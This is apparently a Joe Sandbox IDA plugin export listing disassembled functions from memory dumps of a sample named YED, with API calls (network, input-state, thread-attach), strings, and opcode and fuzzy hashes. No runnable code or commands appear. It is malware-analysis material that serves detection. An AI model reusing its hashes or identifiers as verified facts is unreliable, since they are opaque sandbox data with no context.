Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8c254f820440eaf3121f6c1207a2a1320752c817b02bc3af2413c513e8c790b3
Instruction ID: c6536c9da98d8ccc89ed3e472faf70285106499003cccc57501644e57b1f05b6
Opcode Fuzzy Hash: 8c254f820440eaf3121f6c1207a2a1320752c817b02bc3af2413c513e8c790b3
Instruction Fuzzy Hash: 7B919E35614202AFDB20CF55D4C8F5ABBE4BF44328F1585A9E4698B6A2C770EC91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00298CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00298CF3

Part of subcall function 00278E54: _wcslen.LIBCMT ref: 00278E77

_wcslen.LIBCMT ref: 00298D4E
_wcslen.LIBCMT ref: 00298D9C
_wcslen.LIBCMT ref: 00298DDC
_wcslen.LIBCMT ref: 00298E6E

Strings

winapi, xrefs: 00298D96, 00298D9B
cdecl, xrefs: 00298D48, 00298D4D
stdcall, xrefs: 00298DD6, 00298DDB
none, xrefs: 00298E65, 00298E6A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 722097796cbcd356d7932a81e7365501c4a0b47ae5a592cc909d343c4b3e2db2
Instruction ID: 037b911ad17cb9d9222c1475ed8b5f26a07ee5ee7c6b0538cc1b382d152f2a07
Opcode Fuzzy Hash: 722097796cbcd356d7932a81e7365501c4a0b47ae5a592cc909d343c4b3e2db2
Instruction Fuzzy Hash: 7D51B031A201179BCF14DF68C8509BEB3A5BF66720B294229F466E72C4EB31DD60CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0029372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00293774
CoUninitialize.OLE32 ref: 0029377F
CoCreateInstance.OLE32(?,00000000,00000017,002AFB78,?), ref: 002937D9
IIDFromString.OLE32(?,?), ref: 0029384C
VariantInit.OLEAUT32(?), ref: 002938E4
VariantClear.OLEAUT32(?), ref: 00293936

Strings

NULL Pointer assignment, xrefs: 0029381E
Invalid parameter, xrefs: 00293865
Failed to create object, xrefs: 002937E4, 0029389A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e29dbfd49b9ed7c12a3d918e9be67643a12312f7a1cdd750af4154ab85eed29d
Instruction ID: d717d66a841554e87756c1a7869688efcd0f4402df6de1156c26f5a196b27368
Opcode Fuzzy Hash: e29dbfd49b9ed7c12a3d918e9be67643a12312f7a1cdd750af4154ab85eed29d
Instruction Fuzzy Hash: 8461AF70628301AFD711DF54D888BAABBE8FF49714F104819F9859B291D770EE58CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00288195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00288257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00288267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00288273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00288310
SetCurrentDirectoryW.KERNEL32(?), ref: 00288324
SetCurrentDirectoryW.KERNEL32(?), ref: 00288356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0028838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00288395

Strings

*.*, xrefs: 0028839B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: b286847d7fc5135ec358afc61ead52976c4592fba277458fb64505180d8f8e8c
Instruction ID: d7ab884ca754347354850512266e8b9d9c2afa675557839a7367c8dae3a85a12
Opcode Fuzzy Hash: b286847d7fc5135ec358afc61ead52976c4592fba277458fb64505180d8f8e8c
Instruction Fuzzy Hash: FF61ACB65243459FCB10EF20C8449AEB3E8FF89310F44885EF98983251EB31E965CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00283388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002833CF

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002833F0

Strings

Line %d (File "%s"):, xrefs: 00283443, 0028345C
^ ERROR , xrefs: 0028349E
"%s" (%d) : ==> %s:%s%s, xrefs: 00283504
Error: , xrefs: 002834D1
Incorrect parameters to object property !, xrefs: 002834AB
"%s" (%d) : ==> %s:, xrefs: 00283522

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: acf6c157e56cf00d6891a11e38c8e5d7521bd192c73c430dd84b99d7f52ed637
Instruction ID: 7a02e557a159019539d17d5e009abb0abdb79197739e1d24d2116955073dfdcd
Opcode Fuzzy Hash: acf6c157e56cf00d6891a11e38c8e5d7521bd192c73c430dd84b99d7f52ed637
Instruction Fuzzy Hash: 49518F71920209AADF14EBA0DD46EEEB3B9AF19740F104066F50572192EB352FF8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 002A8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

Part of subcall function 0022912D: GetCursorPos.USER32(?), ref: 00229141
Part of subcall function 0022912D: ScreenToClient.USER32(00000000,?), ref: 0022915E
Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 00229183
Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 0022919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 002A8B6B
ImageList_EndDrag.COMCTL32 ref: 002A8B71
ReleaseCapture.USER32 ref: 002A8B77
SetWindowTextW.USER32 ref: 002A8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002A8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 002A8CFF

Strings

@GUI_DRAGFILE, xrefs: 002A8C9A
@GUI_DROPID, xrefs: 002A8C51
p#., xrefs: 002A8C71

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#.
API String ID: 1924731296-2689671650
Opcode ID: 3c823962be045484e8104ca0f13efb6533a6adc350193064e1f691c82f2172df
Instruction ID: 899198900a54dcbeedb9b95ae23a067bf29cc2c76dfe69138db9cd04767e333d
Opcode Fuzzy Hash: 3c823962be045484e8104ca0f13efb6533a6adc350193064e1f691c82f2172df
Instruction Fuzzy Hash: 3251AC71114340AFD704DF10EC99FAA77E5FB89710F40062AF996672A2CB709964CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0027B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0027B5FC
_wcslen.LIBCMT ref: 0027B608
_wcslen.LIBCMT ref: 0027B64D
_wcslen.LIBCMT ref: 0027B68C
_wcslen.LIBCMT ref: 0027B6C7

Strings

KEYS, xrefs: 0027B647, 0027B64C
REMOVE, xrefs: 0027B602, 0027B607
APPEND, xrefs: 0027B6C1, 0027B6C6
EXISTS, xrefs: 0027B686, 0027B68B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 7575b85b4969c2e14e6ce92ae128cea8eacab0111fd8dae11d4108fdf1b47140
Instruction ID: 5f233d3c2ea88e929d337c17eda6a6e11e4d5aaa1d3c3f12468195d37af15a30
Opcode Fuzzy Hash: 7575b85b4969c2e14e6ce92ae128cea8eacab0111fd8dae11d4108fdf1b47140
Instruction Fuzzy Hash: 3E41EC32A200279BCB116F7DC8907BEB7A9FF61754B248129E629D7284E735CDA1C790

Uniqueness

Uniqueness Score: -1.00%

Function 00285393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002853A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00285416
GetLastError.KERNEL32 ref: 00285420
SetErrorMode.KERNEL32(00000000,READY), ref: 002854A7

Strings

UNKNOWN, xrefs: 00285444
NOTREADY, xrefs: 0028544B
INVALID, xrefs: 00285459
READONLY, xrefs: 00285452
READY, xrefs: 00285460, 00285468

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 404d70c2d470ccb1ceac9fc28e764da4368c8612beaf6e01b9a8fe9ab5cdfe2b
Instruction ID: 2f42cba97a43a57ca04bc58c18194c10c7a81600b961a50d92069030cc746e98
Opcode Fuzzy Hash: 404d70c2d470ccb1ceac9fc28e764da4368c8612beaf6e01b9a8fe9ab5cdfe2b
Instruction Fuzzy Hash: 0F31C339A216159FD710EF68C488AAABBF4FF45305F148066E405CB3D2DB71DDA6CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0027B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(?,?,?,?,?,0027A1E1,?,00000001), ref: 0027B151
GetForegroundWindow.USER32 ref: 0027B165
GetWindowThreadProcessId.USER32(00000000), ref: 0027B16C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0027B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0027B18D
AttachThreadInput.USER32(?,00000000,00000001), ref: 0027B1A6
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0027B1B8
AttachThreadInput.USER32(00000000,00000000), ref: 0027B1FD
AttachThreadInput.USER32(?,?,00000000), ref: 0027B212
AttachThreadInput.USER32(00000000,?,00000000), ref: 0027B21D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3973b16c8e758c2e127850fe09b721588ebf2d06ad5ccef3713e8a8f6c44360e
Instruction ID: 2c901eec3646fb88692186d3117fc542baac676b1777228e82962cdfafffb2c1
Opcode Fuzzy Hash: 3973b16c8e758c2e127850fe09b721588ebf2d06ad5ccef3713e8a8f6c44360e
Instruction Fuzzy Hash: CD31CE71560209BFDB12DF24EC8CB6E7BADBB51312F208414FA08DB191DBB49E008F60

Uniqueness

Uniqueness Score: -1.00%

Function 00242C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00242C94

Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0

_free.LIBCMT ref: 00242CA0
_free.LIBCMT ref: 00242CAB
_free.LIBCMT ref: 00242CB6
_free.LIBCMT ref: 00242CC1
_free.LIBCMT ref: 00242CCC
_free.LIBCMT ref: 00242CD7
_free.LIBCMT ref: 00242CE2
_free.LIBCMT ref: 00242CED
_free.LIBCMT ref: 00242CFB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46924c189278898ad1df68b71763328b3861e1bc91818ec61a58d9b624b77045
Instruction ID: eea809b0cc66291a78e1f970bd6378901741b70bdb17fba240eb77d6c10369c6
Opcode Fuzzy Hash: 46924c189278898ad1df68b71763328b3861e1bc91818ec61a58d9b624b77045
Instruction Fuzzy Hash: C811D776120108EFDB0AEF56D882CDD3BA5FF05350FA154A1F9489F222DA31EE649F90

Uniqueness

Uniqueness Score: -1.00%

Function 02A02080 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A02094
_free.LIBCMT ref: 02A020A0
_free.LIBCMT ref: 02A020AB
_free.LIBCMT ref: 02A020B6
_free.LIBCMT ref: 02A020C1
_free.LIBCMT ref: 02A020CC
_free.LIBCMT ref: 02A020D7
_free.LIBCMT ref: 02A020E2
_free.LIBCMT ref: 02A020ED
_free.LIBCMT ref: 02A020FB

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction ID: 5ad32a276c032faefbe04b5f0bd4598d7dfd6af6ae24e6736f500628c757e9b1
Opcode Fuzzy Hash: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction Fuzzy Hash: 35117476540209AFCB01EF54EA81CDD3BA6EF05350B5189A5FA0C9F2A1DE31EE51AF80

Uniqueness

Uniqueness Score: -1.00%

Function 02A324F7 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A3258D
_wcslen.LIBCMT ref: 02A325F8

Strings

[L, xrefs: 02A32746
[L, xrefs: 02A3279A

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _wcslen
String ID: [L$[L
API String ID: 176396367-175131883
Opcode ID: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
Instruction ID: fca41943caa189037ef2d8d9438c6cb9e3e76cf1015f3e5b9cd69337801882ac
Opcode Fuzzy Hash: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
Instruction Fuzzy Hash: 80E1C532A00616ABCB25DF78C890BEDFBB5BF44754F54811AF956A7240EF30AD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00211410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00211459
OleUninitialize.OLE32 ref: 002114F8
UnregisterHotKey.USER32(?), ref: 002116DD
DestroyWindow.USER32 ref: 002524B9
FreeLibrary.KERNEL32(?), ref: 0025251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0025254B

Strings

close all, xrefs: 00211454

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1ba92c504c1b142c3caefbda532d930a4fe3f79f8b0ae3cdf999e604b0454707
Instruction ID: b41c93daa9cdd087f747ec850bb0df38dd3aea529df270c077a6685c79dbaac2
Opcode Fuzzy Hash: 1ba92c504c1b142c3caefbda532d930a4fe3f79f8b0ae3cdf999e604b0454707
Instruction Fuzzy Hash: 4FD1BD30721222CFCB19EF14C599B69F7A4BF16700F6441ADE94A6B291DB30AC7ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 0028359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002835E4

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

LoadStringW.USER32(002E2390,?,00000FFF,?), ref: 0028360A

Strings

Line %d (File "%s"):, xrefs: 0028366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00283724
Error: , xrefs: 002836EF
"%s" (%d) : ==> %s:, xrefs: 00283742
^ ERROR, xrefs: 002836C9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 673a2aa1e3819ab5320e60ca8e90c3d67cdfc93964297bd1c04e229cf3d5f28f
Instruction ID: 98b4fa43ce8498514833782787af54bdb1df3d01f5a80b13daf492a67c03593a
Opcode Fuzzy Hash: 673a2aa1e3819ab5320e60ca8e90c3d67cdfc93964297bd1c04e229cf3d5f28f
Instruction Fuzzy Hash: DE517E7182021ABBDF14EBA0DC56EEDBBB9AF14700F144165F505721A1EB316AF8DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0028C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0028C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0028C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0028C2CA
GetLastError.KERNEL32 ref: 0028C322
SetEvent.KERNEL32(?), ref: 0028C336
InternetCloseHandle.WININET(00000000), ref: 0028C341

Strings

, xrefs: 0028C2BB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 50f2ac6457385d75fb14a89481bd431812a9f9a93e3b1c4cf6e15828ba905874
Instruction ID: 9804872516586de4611a37524fc117a4f8070fbe06d929b7b67356fdec7116ae
Opcode Fuzzy Hash: 50f2ac6457385d75fb14a89481bd431812a9f9a93e3b1c4cf6e15828ba905874
Instruction Fuzzy Hash: C331A0B5521304AFD721AF649C88ABB7BFCEB49744F24855EF446D2280DB34DD158B70

Uniqueness

Uniqueness Score: -1.00%

Function 0027209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0027214D

Strings

smallicons, xrefs: 00272115
SHELLDLL_DefView, xrefs: 002720CC
details, xrefs: 002720FB
list, xrefs: 0027212F
largeicons, xrefs: 002720E1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
